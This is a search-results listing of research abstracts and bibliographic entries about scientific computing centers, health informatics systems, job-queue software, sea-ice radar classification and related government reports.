    Despite evidence over the past decade that patients like and will use patient-centered computing systems in managing their health, patients have remained forgotten stakeholders in advances in clinical computing systems. We present a framework for patient empowerment and the technical realization of that framework in an architecture called CareLink. In an evaluation of the initial deployment of CareLink in the support of neonatal intensive care, we have demonstrated a reduction in the length of stay for very-low birthweight infants, and an improvement in family satisfaction with care delivery. With the ubiquitous adoption of the Internet into the general culture, patient-centered computing provides the opportunity to mend broken health care relationships and reconnect patients to the care delivery process. CareLink itself provides functionality to support both clinical care and research, and provides a living laboratory for the further study of patient-centered computing.

  1. Joint the Center for Applied Scientific Computing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Gamblin, Todd; Bremer, Timo; Van Essen, Brian

    The Center for Applied Scientific Computing serves as Livermore Lab’s window to the broader computer science, computational physics, applied mathematics, and data science research communities. In collaboration with academic, industrial, and other government laboratory partners, we conduct world-class scientific research and development on problems critical to national security. CASC applies the power of high-performance computing and the efficiency of modern computational methods to the realms of stockpile stewardship, cyber and energy security, and knowledge discovery for intelligence applications.

  2. Advanced Biomedical Computing Center (ABCC) | DSITP

    Cancer.gov

    The Advanced Biomedical Computing Center (ABCC), located in Frederick Maryland (MD), provides HPC resources for both NIH/NCI intramural scientists and the extramural biomedical research community. Its mission is to provide HPC support, to provide collaborative research, and to conduct in-house research in various areas of computational biology and biomedical research.

  3. New developments in delivering public access to data from the National Center for Computational Toxicology at the EPA

    EPA Science Inventory

    Researchers at EPA’s National Center for Computational Toxicology integrate advances in biology, chemistry, and computer science to examine the toxicity of chemicals and help prioritize chemicals for further research based on potential human health risks. The goal of this researc...

  4. Community Information Centers and the Computer.

    ERIC Educational Resources Information Center

    Carroll, John M.; Tague, Jean M.

    Two computer data bases have been developed by the Computer Science Department at the University of Western Ontario for "Information London," the local community information center. One system, called LONDON, permits Boolean searches of a file of 5,000 records describing human service agencies in the London area. The second system,…

  5. 78 FR 69926 - Privacy Act of 1974, as Amended; Computer Matching Program (SSA/Centers for Medicare & Medicaid...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-11-21

    ... SOCIAL SECURITY ADMINISTRATION [Docket No. SSA 2013-0059] Privacy Act of 1974, as Amended; Computer Matching Program (SSA/ Centers for Medicare & Medicaid Services (CMS))--Match Number 1076 AGENCY: Social Security Administration (SSA). ACTION: Notice of a renewal of an existing computer matching...

  6. 76 FR 21091 - Privacy Act of 1974, as Amended; Computer Matching Program (SSA/Centers for Medicare & Medicaid...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-04-14

    ... SOCIAL SECURITY ADMINISTRATION [Docket No. SSA 2011-0022] Privacy Act of 1974, as Amended; Computer Matching Program (SSA/ Centers for Medicare & Medicaid Services (CMS))--Match Number 1076 AGENCY: Social Security Administration (SSA). ACTION: Notice of a renewal of an existing computer matching...

  7. Cornell University Center for Advanced Computing

    Science.gov Websites

    Resource Center Data Management (RDMSG) Computational Agriculture National Science Foundation Other Public agriculture technology acquired Lifka joins National Science Foundation CISE Advisory Committee © Cornell

  8. Digital optical computers at the optoelectronic computing systems center

    NASA Technical Reports Server (NTRS)

    Jordan, Harry F.

    1991-01-01

    The Digital Optical Computing Program within the National Science Foundation Engineering Research Center for Opto-electronic Computing Systems has as its specific goal research on optical computing architectures suitable for use at the highest possible speeds. The program can be targeted toward exploiting the time domain because other programs in the Center are pursuing research on parallel optical systems, exploiting optical interconnection and optical devices and materials. Using a general purpose computing architecture as the focus, we are developing design techniques, tools and architecture for operation at the speed of light limit. Experimental work is being done with the somewhat low speed components currently available but with architectures which will scale up in speed as faster devices are developed. The design algorithms and tools developed for a general purpose, stored program computer are being applied to other systems such as optimally controlled optical communication networks.

  9. Final Report. Center for Scalable Application Development Software

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Mellor-Crummey, John

    2014-10-26

    The Center for Scalable Application Development Software (CScADS) was established as a part- nership between Rice University, Argonne National Laboratory, University of California Berkeley, University of Tennessee – Knoxville, and University of Wisconsin – Madison. CScADS pursued an integrated set of activities with the aim of increasing the productivity of DOE computational scientists by catalyzing the development of systems software, libraries, compilers, and tools for leadership computing platforms. Principal Center activities were workshops to engage the research community in the challenges of leadership computing, research and development of open-source software, and work with computational scientists to help them develop codesmore » for leadership computing platforms. This final report summarizes CScADS activities at Rice University in these areas.« less

  10. Intention and Usage of Computer Based Information Systems in Primary Health Centers

    ERIC Educational Resources Information Center

    Hosizah; Kuntoro; Basuki N., Hari

    2016-01-01

    The computer-based information system (CBIS) is adopted by almost all of in health care setting, including the primary health center in East Java Province Indonesia. Some of softwares available were SIMPUS, SIMPUSTRONIK, SIKDA Generik, e-puskesmas. Unfortunately they were most of the primary health center did not successfully implemented. This…

  11. Using Frameworks in a Government Contracting Environment: Case Study at the NASA Center for Computational Sciences

    NASA Technical Reports Server (NTRS)

    McGalliard, James

    2008-01-01

    A viewgraph describing the use of multiple frameworks by NASA, GSA, and U.S. Government agencies is presented. The contents include: 1) Federal Systems Integration and Management Center (FEDSIM) and NASA Center for Computational Sciences (NCCS) Environment; 2) Ruling Frameworks; 3) Implications; and 4) Reconciling Multiple Frameworks.

  12. Roy Fraley | NREL

    Science.gov Websites

    Roy Fraley Roy Fraley Professional II-Engineer Roy.Fraley@nrel.gov | 303-384-6468 Roy Fraley is the high-performance computing (HPC) data center engineer with the Computational Science Center's HPC

  13. JobCenter: an open source, cross-platform, and distributed job queue management system optimized for scalability and versatility.

    PubMed

    Jaschob, Daniel; Riffle, Michael

    2012-07-30

    Laboratories engaged in computational biology or bioinformatics frequently need to run lengthy, multistep, and user-driven computational jobs. Each job can tie up a computer for a few minutes to several days, and many laboratories lack the expertise or resources to build and maintain a dedicated computer cluster. JobCenter is a client-server application and framework for job management and distributed job execution. The client and server components are both written in Java and are cross-platform and relatively easy to install. All communication with the server is client-driven, which allows worker nodes to run anywhere (even behind external firewalls or "in the cloud") and provides inherent load balancing. Adding a worker node to the worker pool is as simple as dropping the JobCenter client files onto any computer and performing basic configuration, which provides tremendous ease-of-use, flexibility, and limitless horizontal scalability. Each worker installation may be independently configured, including the types of jobs it is able to run. Executed jobs may be written in any language and may include multistep workflows. JobCenter is a versatile and scalable distributed job management system that allows laboratories to very efficiently distribute all computational work among available resources. JobCenter is freely available at http://code.google.com/p/jobcenter/.

  14. Computers in Schools of Southeast Texas in 1997.

    ERIC Educational Resources Information Center

    Henderson, David L.; Renfrow, Raylene

    This study examined computer use in southeast Texas schools in 1997. The study population included 110 school districts in Education Service Center Regions IV and VI. These centers serve 22 counties of southeast Texas in the Houston area. Using questionnaires, researchers collected data on brands of computers presently in use, percent of computer…

  15. 77 FR 33547 - Privacy Act of 1974, as Amended; Computer Matching Program (SSA/Centers for Medicare and Medicaid...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2012-06-06

    ... SOCIAL SECURITY ADMINISTRATION [Docket No. SSA 2012-0015] Privacy Act of 1974, as Amended; Computer Matching Program (SSA/ Centers for Medicare and Medicaid Services (CMS))--Match Number 1094 AGENCY: Social Security Administration (SSA). ACTION: Notice of a new computer matching program that will expire...

  16. The National Special Education Alliance: One Year Later.

    ERIC Educational Resources Information Center

    Green, Peter

    1988-01-01

    The National Special Education Alliance (a national network of local computer resource centers associated with Apple Computer, Inc.) consists, one year after formation, of 24 non-profit support centers staffed largely by volunteers. The NSEA now reaches more than 1000 disabled computer users each month and more growth in the future is expected.…

  17. The Benefits of Making Data from the EPA National Center for Computational Toxicology available for reuse (ACS Fall meeting 3 of 12)

    EPA Science Inventory

    Researchers at EPA’s National Center for Computational Toxicology (NCCT) integrate advances in biology, chemistry, exposure and computer science to help prioritize chemicals for further research based on potential human health risks. The goal of this research is to quickly evalua...

  18. Books, Bytes, and Bridges: Libraries and Computer Centers in Academic Institutions.

    ERIC Educational Resources Information Center

    Hardesty, Larry, Ed.

    This book about the relationship between computer centers and libraries at academic institutions contains the following chapters: (1) "A History of the Rhetoric and Reality of Library and Computing Relationships" (Peggy Seiden and Michael D. Kathman); (2) "An Issue in Search of a Metaphor: Readings on the Marriageability of…

  19. Computational structures technology and UVA Center for CST

    NASA Technical Reports Server (NTRS)

    Noor, Ahmed K.

    1992-01-01

    Rapid advances in computer hardware have had a profound effect on various engineering and mechanics disciplines, including the materials, structures, and dynamics disciplines. A new technology, computational structures technology (CST), has recently emerged as an insightful blend between material modeling, structural and dynamic analysis and synthesis on the one hand, and other disciplines such as computer science, numerical analysis, and approximation theory, on the other hand. CST is an outgrowth of finite element methods developed over the last three decades. The focus of this presentation is on some aspects of CST which can impact future airframes and propulsion systems, as well as on the newly established University of Virginia (UVA) Center for CST. The background and goals for CST are described along with the motivations for developing CST, and a brief discussion is made on computational material modeling. We look at the future in terms of technical needs, computing environment, and research directions. The newly established UVA Center for CST is described. One of the research projects of the Center is described, and a brief summary of the presentation is given.

  20. Computer programs: Operational and mathematical, a compilation

    NASA Technical Reports Server (NTRS)

    1973-01-01

    Several computer programs which are available through the NASA Technology Utilization Program are outlined. Presented are: (1) Computer operational programs which can be applied to resolve procedural problems swiftly and accurately. (2) Mathematical applications for the resolution of problems encountered in numerous industries. Although the functions which these programs perform are not new and similar programs are available in many large computer center libraries, this collection may be of use to centers with limited systems libraries and for instructional purposes for new computer operators.

  1. For operation of the Computer Software Management and Information Center (COSMIC)

    NASA Technical Reports Server (NTRS)

    Carmon, J. L.

    1983-01-01

    Progress report on current status of computer software management and information center (COSMIC) includes the following areas: inventory, evaluation and publication, marketing, customer service, maintenance and support, and budget summary.

  2. Center for Advanced Computational Technology

    NASA Technical Reports Server (NTRS)

    Noor, Ahmed K.

    2000-01-01

    The Center for Advanced Computational Technology (ACT) was established to serve as a focal point for diverse research activities pertaining to application of advanced computational technology to future aerospace systems. These activities include the use of numerical simulations, artificial intelligence methods, multimedia and synthetic environments, and computational intelligence, in the modeling, analysis, sensitivity studies, optimization, design and operation of future aerospace systems. The Center is located at NASA Langley and is an integral part of the School of Engineering and Applied Science of the University of Virginia. The Center has four specific objectives: 1) conduct innovative research on applications of advanced computational technology to aerospace systems; 2) act as pathfinder by demonstrating to the research community what can be done (high-potential, high-risk research); 3) help in identifying future directions of research in support of the aeronautical and space missions of the twenty-first century; and 4) help in the rapid transfer of research results to industry and in broadening awareness among researchers and engineers of the state-of-the-art in applications of advanced computational technology to the analysis, design prototyping and operations of aerospace and other high-performance engineering systems. In addition to research, Center activities include helping in the planning and coordination of the activities of a multi-center team of NASA and JPL researchers who are developing an intelligent synthesis environment for future aerospace systems; organizing workshops and national symposia; as well as writing state-of-the-art monographs and NASA special publications on timely topics.

  3. CNC Turning Center Advanced Operations. Computer Numerical Control Operator/Programmer. 444-332.

    ERIC Educational Resources Information Center

    Skowronski, Steven D.; Tatum, Kenneth

    This student guide provides materials for a course designed to introduce the student to the operations and functions of a two-axis computer numerical control (CNC) turning center. The course consists of seven units. Unit 1 presents course expectations and syllabus, covers safety precautions, and describes the CNC turning center components, CNC…

  4. Information and psychomotor skills knowledge acquisition: A student-customer-centered and computer-supported approach.

    PubMed

    Nicholson, Anita; Tobin, Mary

    2006-01-01

    This presentation will discuss coupling commercial and customized computer-supported teaching aids to provide BSN nursing students with a friendly customer-centered self-study approach to psychomotor skill acquisition.

  5. Computational mechanics and physics at NASA Langley Research Center

    NASA Technical Reports Server (NTRS)

    South, Jerry C., Jr.

    1987-01-01

    An overview is given of computational mechanics and physics at NASA Langley Research Center. Computational analysis is a major component and tool in many of Langley's diverse research disciplines, as well as in the interdisciplinary research. Examples are given for algorithm development and advanced applications in aerodynamics, transition to turbulence and turbulence simulation, hypersonics, structures, and interdisciplinary optimization.

  6. Center for computation and visualization of geometric structures. Final report, 1992 - 1995

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    NONE

    1995-11-01

    This report describes the overall goals and the accomplishments of the Geometry Center of the University of Minnesota, whose mission is to develop, support, and promote computational tools for visualizing geometric structures, for facilitating communication among mathematical and computer scientists and between these scientists and the public at large, and for stimulating research in geometry.

  7. 76 FR 56744 - Privacy Act of 1974; Notice of a Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-09-14

    ...; Notice of a Computer Matching Program AGENCY: Defense Manpower Data Center, Department of Defense (DoD... (SSA) and DoD Defense Manpower Data Center (DMDC) that their records are being matched by computer. The... intrusion of the individual's privacy and would result in additional delay in the eventual SSI payment and...

  8. Applied technology center business plan and market survey

    NASA Technical Reports Server (NTRS)

    Hodgin, Robert F.; Marchesini, Roberto

    1990-01-01

    Business plan and market survey for the Applied Technology Center (ATC), computer technology transfer and development non-profit corporation, is presented. The mission of the ATC is to stimulate innovation in state-of-the-art and leading edge computer based technology. The ATC encourages the practical utilization of late-breaking computer technologies by firms of all variety.

  9. A Queue Simulation Tool for a High Performance Scientific Computing Center

    NASA Technical Reports Server (NTRS)

    Spear, Carrie; McGalliard, James

    2007-01-01

    The NASA Center for Computational Sciences (NCCS) at the Goddard Space Flight Center provides high performance highly parallel processors, mass storage, and supporting infrastructure to a community of computational Earth and space scientists. Long running (days) and highly parallel (hundreds of CPUs) jobs are common in the workload. NCCS management structures batch queues and allocates resources to optimize system use and prioritize workloads. NCCS technical staff use a locally developed discrete event simulation tool to model the impacts of evolving workloads, potential system upgrades, alternative queue structures and resource allocation policies.

  10. Marin Computer Center.

    ERIC Educational Resources Information Center

    Fox, Annie

    1978-01-01

    Relates some experiences at this nonprofit center, which was designed so that interested members of the general public can walk in and learn about computers in a safe, nonintimidating environment. STARWARS HODGE, a game written in PILOT, is also described. (CMV)

  11. 75 FR 65639 - Center for Scientific Review; Notice of Closed Meetings

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-10-26

    ...: Computational Biology Special Emphasis Panel A. Date: October 29, 2010. Time: 2 p.m. to 3:30 p.m. Agenda: To.... Name of Committee: Center for Scientific Review Special Emphasis Panel; Member Conflict: Computational...

  12. The Operation of a Specialized Scientific Information and Data Analysis Center With Computer Base and Associated Communications Network.

    ERIC Educational Resources Information Center

    Cottrell, William B.; And Others

    The Nuclear Safety Information Center (NSIC) is a highly sophisticated scientific information center operated at Oak Ridge National Laboratory (ORNL) for the U.S. Atomic Energy Commission. Its information file, which consists of both data and bibliographic information, is computer stored and numerous programs have been developed to facilitate the…

  13. 78 FR 42080 - Privacy Act of 1974; CMS Computer Match No. 2013-07; HHS Computer Match No. 1303; DoD-DMDC Match...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-07-15

    ... with the Department of Defense (DoD), Defense Manpower Data Center (DMDC). We have provided background... & Medicaid Services and the Department of Defense, Defense Manpower Data Center for the Determination of...), Centers for Medicare & Medicaid Services (CMS), and Department of Defense (DoD), Defense Manpower Data...

  14. JobCenter: an open source, cross-platform, and distributed job queue management system optimized for scalability and versatility

    PubMed Central

    2012-01-01

    Background Laboratories engaged in computational biology or bioinformatics frequently need to run lengthy, multistep, and user-driven computational jobs. Each job can tie up a computer for a few minutes to several days, and many laboratories lack the expertise or resources to build and maintain a dedicated computer cluster. Results JobCenter is a client–server application and framework for job management and distributed job execution. The client and server components are both written in Java and are cross-platform and relatively easy to install. All communication with the server is client-driven, which allows worker nodes to run anywhere (even behind external firewalls or “in the cloud”) and provides inherent load balancing. Adding a worker node to the worker pool is as simple as dropping the JobCenter client files onto any computer and performing basic configuration, which provides tremendous ease-of-use, flexibility, and limitless horizontal scalability. Each worker installation may be independently configured, including the types of jobs it is able to run. Executed jobs may be written in any language and may include multistep workflows. Conclusions JobCenter is a versatile and scalable distributed job management system that allows laboratories to very efficiently distribute all computational work among available resources. JobCenter is freely available at http://code.google.com/p/jobcenter/. PMID:22846423

  15. Center for Center for Technology for Advanced Scientific Component Software (TASCS)

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Kostadin, Damevski

    A resounding success of the Scientific Discovery through Advanced Computing (SciDAC) program is that high-performance computational science is now universally recognized as a critical aspect of scientific discovery [71], complementing both theoretical and experimental research. As scientific communities prepare to exploit unprecedented computing capabilities of emerging leadership-class machines for multi-model simulations at the extreme scale [72], it is more important than ever to address the technical and social challenges of geographically distributed teams that combine expertise in domain science, applied mathematics, and computer science to build robust and flexible codes that can incorporate changes over time. The Center for Technologymore » for Advanced Scientific Component Software (TASCS)1 tackles these these issues by exploiting component-based software development to facilitate collaborative high-performance scientific computing.« less

  16. Use of computers and Internet among people with severe mental illnesses at peer support centers.

    PubMed

    Brunette, Mary F; Aschbrenner, Kelly A; Ferron, Joelle C; Ustinich, Lee; Kelly, Michael; Grinley, Thomas

    2017-12-01

    Peer support centers are an ideal setting where people with severe mental illnesses can access the Internet via computers for online health education, peer support, and behavioral treatments. The purpose of this study was to assess computer use and Internet access in peer support agencies. A peer-assisted survey assessed the frequency with which consumers in all 13 New Hampshire peer support centers (n = 702) used computers to access Internet resources. During the 30-day survey period, 200 of the 702 peer support consumers (28%) responded to the survey. More than 3 quarters (78.5%) of respondents had gone online to seek information in the past year. About half (49%) of respondents were interested in learning about online forums that would provide information and peer support for mental health issues. Peer support centers may be a useful venue for Web-based approaches to education, peer support, and intervention. Future research should assess facilitators and barriers to use of Web-based resources among people with severe mental illness in peer support centers. (PsycINFO Database Record (c) 2017 APA, all rights reserved).

  17. Ice/water Classification of Sentinel-1 Images

    NASA Astrophysics Data System (ADS)

    Korosov, Anton; Zakhvatkina, Natalia; Muckenhuber, Stefan

    2015-04-01

    Sea Ice monitoring and classification relies heavily on synthetic aperture radar (SAR) imagery. These sensors record data either only at horizontal polarization (RADARSAT-1) or vertically polarized (ERS-1 and ERS-2) or at dual polarization (Radarsat-2, Sentinel-1). Many algorithms have been developed to discriminate sea ice types and open water using single polarization images. Ice type classification, however, is still ambiguous in some cases. Sea ice classification in single polarization SAR images has been attempted using various methods since the beginning of the ERS programme. The robust classification using only SAR images that can provide useful results under varying sea ice types and open water tend to be not generally applicable in operational regime. The new generation SAR satellites have capability to deliver images in several polarizations. This gives improved possibility to develop sea ice classification algorithms. In this study we use data from Sentinel-1 at dual-polarization, i.e. HH (horizontally transmitted and horizontally received) and HV (horizontally transmitted, vertically received). This mode assembles wide SAR image from several narrower SAR beams, resulting to an image of 500 x 500 km with 50 m resolution. A non-linear scheme for classification of Sentinel-1 data has been developed. The processing allows to identify three classes: ice, calm water and rough water at 1 km spatial resolution. The raw sigma0 data in HH and HV polarization are first corrected for thermal and random noise by extracting the background thermal noise level and smoothing the image with several filters. At the next step texture characteristics are computed in a moving window using a Gray Level Co-occurence Matrix (GLCM). A neural network is applied at the last step for processing array of the most informative texture characteristics and ice/water classification. The main results are: * the most informative texture characteristics to be used for sea ice classification were revealed; * the best set of parameters including the window size, number of levels of quantization of sigma0 values and co-occurence distance was found; * a support vector machine (SVM) was trained on results of visual classification of 30 Sentinel-1 images. Despite the general high accuracy of the neural network (95% of true positive classification) problems with classification of young newly formed ice and rough water arise due to the similar average backscatter and texture. Other methods of smoothing and computation of texture characteristics (e.g. computation of GLCM from a variable size window) is assessed. The developed scheme will be utilized in NRT processing of Sentinel-1 data at NERSC within the MyOcean2 project.

  18. Annual Report of the Metals and Ceramics Information Center, 1 May 1979-30 April 1980.

    DTIC Science & Technology

    1980-07-01

    MANAGEMENT AND ECONOMIC ANALYSIS DEPT. * Computer and Information SyslemsiD. C Operations 1 Battelle Technical Inputs to Planning * Computer Systems 0...Biomass Resources * Education 0 Business Planning * Information Systems * Economics , Planning and Policy Analysis * Statistical and Mathematical Modelrng...Metals and Ceramics Information Center (MCIC) is one of several technical information analysis centers (IAC’s) chartered and sponsored by the

  19. Computer-generated formulas for three-center nuclear-attraction integrals (electrostatic potential) for Slater-type orbitals

    NASA Technical Reports Server (NTRS)

    Jones, H. W.

    1984-01-01

    The computer-assisted C-matrix, Loewdin-alpha-function, single-center expansion method in spherical harmonics has been applied to the three-center nuclear-attraction integral (potential due to the product of separated Slater-type orbitals). Exact formulas are produced for 13 terms of an infinite series that permits evaluation to ten decimal digits of an example using 1s orbitals.

  20. Computer-aided dispatch--traffic management center field operational test final detailed test plan : WSDOT deployment

    DOT National Transportation Integrated Search

    2003-10-01

    The purpose of this document is to expand upon the evaluation components presented in "Computer-aided dispatch--traffic management center field operational test final evaluation plan : WSDOT deployment". This document defines the objective, approach,...

  1. Computer-aided dispatch--traffic management center field operational test : Washington State final report

    DOT National Transportation Integrated Search

    2006-05-01

    This document provides the final report for the evaluation of the USDOT-sponsored Computer-Aided Dispatch - Traffic Management Center Integration Field Operations Test in the State of Washington. The document discusses evaluation findings in the foll...

  2. Argonne Research Library | Argonne National Laboratory

    Science.gov Websites

    Publications Researchers Postdocs Exascale Computing Institute for Molecular Engineering at Argonne Work with Scientific Publications Researchers Postdocs Exascale Computing Institute for Molecular Engineering at IMEInstitute for Molecular Engineering JCESRJoint Center for Energy Storage Research MCSGMidwest Center for

  3. The Effort to Reduce a Muscle Fatigue Through Gymnastics Relaxation and Ergonomic Approach for Computer Users in Central Building State University of Medan

    NASA Astrophysics Data System (ADS)

    Gultom, Syamsul; Darma Sitepu, Indra; Hasibuan, Nurman

    2018-03-01

    Fatigue due to long and continuous computer usage can lead to problems of dominant fatigue associated with decreased performance and work motivation. Specific targets in the first phase have been achieved in this research such as: (1) Identified complaints on workers using computers, using the Bourdon Wiersma test kit. (2) Finding the right relaxation & work posture draft for a solution to reduce muscle fatigue in computer-based workers. The type of research used in this study is research and development method which aims to produce the products or refine existing products. The final product is a prototype of back-holder, monitoring filter and arranging a relaxation exercise as well as the manual book how to do this while in front of the computer to lower the fatigue level for computer users in Unimed’s Administration Center. In the first phase, observations and interviews have been conducted and identified the level of fatigue on the employees of computer users at Uniemd’s Administration Center using Bourdon Wiersma test and has obtained the following results: (1) The average velocity time of respondents in BAUK, BAAK and BAPSI after working with the value of interpretation of the speed obtained value of 8.4, WS 13 was in a good enough category, (2) The average of accuracy of respondents in BAUK, in BAAK and in BAPSI after working with interpretation value accuracy obtained Value of 5.5, WS 8 was in doubt-category. This result shows that computer users experienced a significant tiredness at the Unimed Administration Center, (3) the consistency of the average of the result in measuring tiredness level on computer users in Unimed’s Administration Center after working with values in consistency of interpretation obtained Value of 5.5 with WS 8 was put in a doubt-category, which means computer user in The Unimed Administration Center suffered an extreme fatigue. In phase II, based on the results of the first phase in this research, the researcher offers solutions such as the prototype of Back-Holder, monitoring filter, and design a proper relaxation exercise to reduce the fatigue level. Furthermore, in in order to maximize the exercise itself, a manual book will be given to employees whom regularly work in front of computers at Unimed’s Administration Center

  4. Computer use in primary care and patient-physician communication.

    PubMed

    Sobral, Dilermando; Rosenbaum, Marcy; Figueiredo-Braga, Margarida

    2015-07-08

    This study evaluated how physicians and patients perceive the impact of computer use on clinical communication, and how a patient-centered orientation can influence this impact. The study followed a descriptive cross-sectional design and included 106 family physicians and 392 patients. An original questionnaire assessed computer use, participants' perspective of its impact, and patient centered strategies. Physicians reported spending 42% of consultation time in contact with the computer. A negative impact of computer in patient-physician communication regarding the consultation length, confidentiality, maintaining eye contact, active listening to the patient, and ability to understand the patient was reported by physicians, while patients reported a positive effect for all the items. Physicians considered that the usual computer placement in their consultation room was significantly unfavorable to patient-physician communication. Physicians perceive the impact of computer use on patient-physician communication as negative, while patients have a positive perception of computer use on patient-physician communication. Consultation support can represent a challenge to physicians who recognize its negative impact in patient centered orientation. Medical education programs aiming to enhance specific communication skills and to better integrate computer use in primary care settings are needed. Copyright © 2015 Elsevier Ireland Ltd. All rights reserved.

  5. GSDC: A Unique Data Center in Korea for HEP research

    NASA Astrophysics Data System (ADS)

    Ahn, Sang-Un

    2017-04-01

    Global Science experimental Data hub Center (GSDC) at Korea Institute of Science and Technology Information (KISTI) is a unique data center in South Korea established for promoting the fundamental research fields by supporting them with the expertise on Information and Communication Technology (ICT) and the infrastructure for High Performance Computing (HPC), High Throughput Computing (HTC) and Networking. GSDC has supported various research fields in South Korea dealing with the large scale of data, e.g. RENO experiment for neutrino research, LIGO experiment for gravitational wave detection, Genome sequencing project for bio-medical, and HEP experiments such as CDF at FNAL, Belle at KEK, and STAR at BNL. In particular, GSDC has run a Tier-1 center for ALICE experiment using the LHC at CERN since 2013. In this talk, we present the overview on computing infrastructure that GSDC runs for the research fields and we discuss on the data center infrastructure management system deployed at GSDC.

  6. Issues in Turbulence Simulation for Experimental Comparison

    NASA Astrophysics Data System (ADS)

    Ross, D. W.; Bravenec, R. V.; Dorland, W.; Beer, M. A.; Hammett, G. W.

    1999-11-01

    Studies of the sensitivity of fluctuation spectra and transport fluxes to local plasma parameters and gradients(D. W. Ross et al.), Bull. Am. Phys. Soc. 43, 1760 (1998); D. W. Ross et al., Transport Task Force Workshop, Portland, Oregon, (1999). are continued using nonlinear gyrofluid simulation(M. A. Beer et al.), Phys. Plasmas 2, 2687 (1995). on the T3E at NERSC. Parameters that are characteristic of discharges in DIII-D and Alcator C-Mod are employed. In the previous work, the gradients of Z_eff, n_e, and Te were varied within the experimental uncertainty. Amplitudes and fluxes are quite sensitive to dZ_eff/dr. Here, these studies are continued and extended to variation of other parameters, including T_e/T_i, and dT_i/dr, which are important for ion temperature gradient modes. The role of electric field shear is discussed. Implications for comparison with experiment, including transient perturbations, are discussed, with the goal of quantifying the accuracy of profile data needed to verify the turbulence theory.

  7. First-principles investigation of the interlayer coupling in chromium-trichloride-a layered magnetic insulator

    NASA Astrophysics Data System (ADS)

    Kc, Santosh; McGuire, Michael A.; Cooper, Valentino R.

    The crystallographic, electronic and magnetic properties of layered CrCl3were investigated using density functional theory. We use the newly developed spin van der Waals density functional (svdW-DF) in order to explore the atomic, electronic and magnetic structure. Our results indicate that treatment of the long-range interlayer forces with the svdW-DF improves the accuracy of crystal structure predictions. The cleavage energy was estimated to be 0.29 J/m2 suggesting that CrCl3 should be cleavable using standard mechanical exfoliation techniques. The inclusion of spin in the non-local vdW-DF allows us to directly probe the coupling between the magnetic structure and lattice degrees of freedom. An understanding of the link between electronic, magnetic and structural properties can be useful for novel device applications such as magnetoelectric devices, spin transistors, and 2D magnet. Research was sponsored by the US DOE, Office of Science, BES, MSED and Early Career Research Programs and used resources at NERSC.

  8. FOAM (Functional Ontology Assignments for Metagenomes): A Hidden Markov Model (HMM) database with environmental focus

    DOE PAGES

    Prestat, Emmanuel; David, Maude M.; Hultman, Jenni; ...

    2014-09-26

    A new functional gene database, FOAM (Functional Ontology Assignments for Metagenomes), was developed to screen environmental metagenomic sequence datasets. FOAM provides a new functional ontology dedicated to classify gene functions relevant to environmental microorganisms based on Hidden Markov Models (HMMs). Sets of aligned protein sequences (i.e. ‘profiles’) were tailored to a large group of target KEGG Orthologs (KOs) from which HMMs were trained. The alignments were checked and curated to make them specific to the targeted KO. Within this process, sequence profiles were enriched with the most abundant sequences available to maximize the yield of accurate classifier models. An associatedmore » functional ontology was built to describe the functional groups and hierarchy. FOAM allows the user to select the target search space before HMM-based comparison steps and to easily organize the results into different functional categories and subcategories. FOAM is publicly available at http://portal.nersc.gov/project/m1317/FOAM/.« less

  9. Simple Map with Low MN Perturbation for a Single-Null Divertor Tokamak with Constant Width of Stochastic Layer

    NASA Astrophysics Data System (ADS)

    Verma, Arun; Smith, Terry; Punjabi, Alkesh; Boozer, Allen

    1996-11-01

    In this work, we investigate the effects of low MN perturbations in a single-null divertor tokamak with stochastic scrape-off layer. The unperturbed magnetic topology of a single-null divertor tokamak is represented by Simple Map (Punjabi A, Verma A and Boozer A, Phys Rev Lett), 69, 3322 (1992) and J Plasma Phys, 52, 91 (1994). We choose the combinations of the map parameter k, and the strength of the low MN perturbation such that the width of stochastic layer remains unchanged. We give detailed results on the effects of low MN perturbation on the magnetic topology of the stochastic layer and on the footprint of field lines on the divertor plate given the constraint of constant width of the stochastic layer. The low MN perturbations occur naturally and therefore their effects are of considerable importance in tokamak divertor physics. This work is supported by US DOE OFES. Use of CRAY at HU and at NERSC is gratefully acknowledged.

  10. First-principles simulations of Graphene/Transition-metal-Dichalcogenides/Graphene Field-Effect Transistor

    NASA Astrophysics Data System (ADS)

    Li, Xiangguo; Wang, Yun-Peng; Zhang, X.-G.; Cheng, Hai-Ping

    A prototype field-effect transistor (FET) with fascinating properties can be made by assembling graphene and two-dimensional insulating crystals into three-dimensional stacks with atomic layer precision. Transition metal dichalcogenides (TMDCs) such as WS2, MoS2 are good candidates for the atomically thin barrier between two layers of graphene in the vertical FET due to their sizable bandgaps. We investigate the electronic properties of the Graphene/TMDCs/Graphene sandwich structure using first-principles method. We find that the effective tunnel barrier height of the TMDC layers in contact with the graphene electrodes has a layer dependence and can be modulated by a gate voltage. Consequently a very high ON/OFF ratio can be achieved with appropriate number of TMDC layers and a suitable range of the gate voltage. The spin-orbit coupling in TMDC layers is also layer dependent but unaffected by the gate voltage. These properties can be important in future nanoelectronic device designs. DOE/BES-DE-FG02-02ER45995; NERSC.

  11. High performance computing for advanced modeling and simulation of materials

    NASA Astrophysics Data System (ADS)

    Wang, Jue; Gao, Fei; Vazquez-Poletti, Jose Luis; Li, Jianjiang

    2017-02-01

    The First International Workshop on High Performance Computing for Advanced Modeling and Simulation of Materials (HPCMS2015) was held in Austin, Texas, USA, Nov. 18, 2015. HPCMS 2015 was organized by Computer Network Information Center (Chinese Academy of Sciences), University of Michigan, Universidad Complutense de Madrid, University of Science and Technology Beijing, Pittsburgh Supercomputing Center, China Institute of Atomic Energy, and Ames Laboratory.

  12. Children's Emerging Digital Literacies: Investigating Home Computing in Low- and Middle-Income Families. CCT Reports.

    ERIC Educational Resources Information Center

    Ba, Harouna; Tally, Bill; Tsikalas, Kallen

    The EDC (Educational Development Center) Center for Children and Technology (CCT) and Computers for Youth (CFY) completed a 1-year comparative study of children's use of computers in low- and middle-income homes. The study explores the digital divide as a literacy issue, rather than merely a technical one. Digital literacy is defined as a set of…

  13. Computer-aided dispatch--traffic management center field operational test : state of Utah final report

    DOT National Transportation Integrated Search
